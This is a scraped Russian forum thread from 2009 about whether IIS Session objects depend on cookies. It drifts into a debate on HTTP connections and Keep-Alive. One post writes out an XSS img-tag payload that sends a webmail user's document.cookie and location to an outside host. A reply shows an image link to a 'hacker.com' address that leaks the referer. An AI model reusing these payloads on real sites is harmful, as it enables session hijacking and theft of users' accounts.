|
0 / 0 / 0
Регистрация: 07.12.2008
Сообщений: 43
|
|
Правда или нет что объект Session в IIS работает через cookie?30.01.2009, 18:37. Показов 8040. Ответов 57
Метки нет (Все метки)
0
|
|
| 30.01.2009, 18:37 | |
|
Ответы с готовыми решениями:
57
Проверка если пользователь Онлайн / Хранение его ID в Session или Cookie Правда, что Apache работает стабильнее чем IIS? Как сохранить массив в session или cookie |
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:16 | |
|
Напримемре дырявых почтовых служб :
все что нам нужно так это что бы у клиента при открытии письма нарисовался следующий <img id = X src='javascript:X.src = 'www.pp.rr.cc?data=' + document.cookie + '&data2=' & document.location'> www.pp.rr.cc считает данные и отрисует картинку. Это я от балды написал , но идея примерно такая
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:26 | |
|
Конечно не идиоты сидят и в Sun и Microsoft/
Но согласитесь что не просто так постоянно выходят обнавления. Да и за всем не уследишь. Поэтому я придерживаюсь мнения - нашел чего, оповести производителя.
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 11:30 | |
|
2 AmbX:
совеременные почтовые службы такие от таких ходов давно защищены
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:35 | |
|
А то я гляжу - чего это я тут
уже на 4-ю страницу форума распинаюсь, а они оказывается защещины. И давно ?
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 11:35 | |
|
2 AmbX:
можно даже проще, без javascript, просто ссылка на картинку при запросе будет посылаться http referer, c document.location <img src=http://www.hacker.com/gif.gif> но от этого, тоже нашли способ, все внешние ссылки идут сначала через сервер почтовой службы <img src=http://www.yahoo.com?url=http://www.hacker.com/gif.gif>
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:39 | |
|
А так не пройдет потаму что на картинку открывается
новое соединение в свободном потоке. Это соединение причем не является дочерним (т.е. не наследует права радителя)
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 11:43 | |
|
почему новое соединение?
в современных браузерах и веб-серверах не открывается. и для чего ему права наследовать?
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:50 | |
|
Вы вероятно заметели что каждый IMG IFRAME APPLET .....
загружается в своем потоке и в своем соединении. Т.е. загрузка одного IMG не влияет на главный поток обработки сообщений, они загружаются паралельно. А почему так - потаму что оно действительно работает именно так. Каждый контролл отвечает за себя сам: сам себя рисет , подгружает. Новое соединение не получает прова паралельного соединения. Права передаются на уровне приложений Браузеров , а не соединений.
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:53 | |
|
Да и еще потаму что если поставить перехват на
cетевые WIN API то сразу станет видно сколько соединений открывается при запросе на 1 - URL и что каждое из них гоняет в HTTP загаловке.
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 11:56 | |
|
На счет прав Вы меня не допоняли.
Я имел ввиду что права не наследуются потаму что их не зачем наследовать. Права - достаточно условно, на низком уровне: в HTTP не гонится общая служебная информация родителя.
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 15:05 | |
|
2 AbmX:
>>Вы вероятно заметели что каждый IMG IFRAME APPLET ..... >>загружается в своем потоке и в своем соединении. нет, не замечал, что еще за потоки? уже давно для браузера есть пул соединений и далеко не для каждой картинки открывается свое соединение. Есть такой заголовок Keep-Alive называется, который и определяет убивать соединение или оставить. всякие права родительских и дочерних потоков, значения не имеют
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 15:19 | |
|
Ну раз уж вы завели разгавор сами
то рекомендую обратиться за документацией по теме Keep-Alive with Worker Thread. А также обратить внимание на то что Keep-Alive поддерживается большинством браузеров и серверов. Надеюсь вопросы об открытии соединений в свободных потоках Вам станет немного яснее.
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 15:20 | |
|
Опечатался :
Keep-Alive НЕ поддерживается большинством браузеров и серверов.
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 15:45 | |
|
а зачем мне обращать внимание на открытие соединений в свободных потоках? разве это влияет на то, какие http заголовки передаются? нет, не влияет.
А метод взлома с картинкой на другом сервере многократно описан в литературе по безопасности. Keep-Alive поддерживают Apache и IIS, IE, Netscape, Mozilla, Opera так что вполне достаточно
0
|
|
|
0 / 0 / 0
Регистрация: 21.12.2007
Сообщений: 122
|
|
| 08.02.2009, 16:01 | |
|
Боюсь мне долго придется обьеснять как это работает.
И придется видимо с самого начала. Поэтому я решил закрыть обсуждение этой темы, за ее бесполезностью. На счет взлома - я вам елементарный пример , а вы мне говорите что это давно закрытая дыра. Не понимаю Вам не достаточно идеи ? Или может хотите описание еще не закрытой дыры, так я вам его не дам. Глубже надо мыслить. Когда есть идея , можно найти много способов ее реализации. Спасибо за дискуссию, надеюсь ни кто не устал.
0
|
|
|
4 / 4 / 5
Регистрация: 10.05.2007
Сообщений: 1,616
|
|
| 08.02.2009, 16:37 | |
|
>>Боюсь мне долго придется обьеснять как это работает
что это-то? >>На счет взлома - я вам елементарный пример , а вы мне говорите что это давно закрытая дыра. То что, вы знаете методы взлома почты с веб-интерфейсом это очень хорошо. С другой стороны, кто их сейчас не знает... Вот вы этот свой пример для чего привели-то? Что с куки, что без них пользователям нужны услуги почты с веб-интерфейсом. А производитель должен обеспечить защиту его учетной записи. Если бы можно было обойтись только одной веб-страничкой для организации подобной услуги, тогда сессии бы не понадобились. Но пользователю нужен достаточно богатый интерфейс, он переходит со страницы на страницу, оставаясь при этом 'внутри' одного приложения. Так что без сессий, т.е. 'отслеживания' пользователя не обойтись. Тоже самое во многих других веб-приложениях. Отключение же пользователем у себя куки вовсе не обеспечивает ему защиту, для этого проще совсем не подключаться к сети и не пользоваться веб-почтой. Пользователь отключает у себя куки, не потому что не хочет иметь сессий - он про них может и не слышал. Он хочет защитить свою приватность. При этом как водится с водой выплескивают и ребенка. Если постоянный куки - действительно, в некотором роде, зло, то сессионные - непостоянные куки вполне полезны, а вот много информации о пользователе из них не почерпнешь
0
|
|
|
0 / 0 / 0
Регистрация: 26.07.2007
Сообщений: 24
|
|
| 28.03.2009, 22:05 | |
|
Если в Securiry настройках отключить Session-Cookies - то переменные Session не сохраняются, то есть они работают через cookies. Есть пункт в IE: Tools-->Internet Options-->Security-->Custom Level и там Allow per-session cookies должно быть Enabled. Иначе Session не работает.
0
|
|
|
al
|
|
| 03.04.2009, 04:12 | |
|
to alex78rus:
явнo ты не читaл предыдущие 4 стрaницы пoстoв, уже всё рaзжевaли 10 рaз и выплюнули |
|
| 03.04.2009, 04:12 | |
|
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent Искать еще темы с ответами Или воспользуйтесь поиском по форуму: |
|
Новые блоги и статьи
|
|||
|
Саморегулирующийся социальный контракт для сервера cross-section.
Hrethgir 14.08.2026
С кодом конечно таких глубоких размышлений пока не было, впрочем я уже привык к алгоритмизации. Суть предмета записи: снова в диалоге с нейросетью (я взял пока себе ник для учётки админа - Rector). . . .
|
Часы электронные
Uhbif79 12.08.2026
Выкладываю программу часов. Программа позволяет:
1. Использовать системное время и дату,
2. Есть возможность вводить время и дату вручную.
3. Реализованы 2 будильника: начало и конец рабочего дня. . . .
|
Часы с будильником на основе класса QLCDNumber
Uhbif79 12.08.2026
Всем добрый день, выкладываю программу часов с будильником на основе класса QLCDNumber.
Здесь я пробовал самостоятельно создавал классы, впервые столкнулся с видимостью переменной одного класса из. . .
|
Установка MinGW GCC 16.2 и CMake
8Observer8 10.08.2026
VK Видео:
https:/ / vkvideo. ru/ video-240781534_456239017
YouTube:
eY5-5PyI9NM
Текстовая версия
|
|
Неделя из жизни имитационной модели склада: мои кривые руки растут, откуда надо
anaschu 10.08.2026
Неделя из жизни имитационной модели склада: как я почти написал неправильную логику и что с этим делать
Работаю сейчас над учебно-рабочим проектом: строю в AnyLogic имитационную модель процессов. . .
|
Калькулятор для расчета родства
russiannick 07.08.2026
1. Задача: Создать калькулятор для расчета родства.
Родственных связей существует 8 ступеней, такие как:
p - отец
P - мать
q - муж
Q - жена
b - брат
B - сестра
s - сын
S - дочь
|
Мир по моей воле
kumehtar 07.08.2026
Когда-то кажется, что всё просто. Ты весь такой светлый. Причиняешь добро. Борешься за справедливость в этом тёмном мире.
Потом начинаешь замечать одну неприятную вещь. Почти каждый хороший. . .
|
Кредитный калькулятор
Maks 05.08.2026
Решение задачи по прикладной информатике средствами 1С.
Задача:
Напишите приложение-калькулятор, которое помогает рассчитывать параметры кредита для аннуитетного и дифференцированного видов. . .
|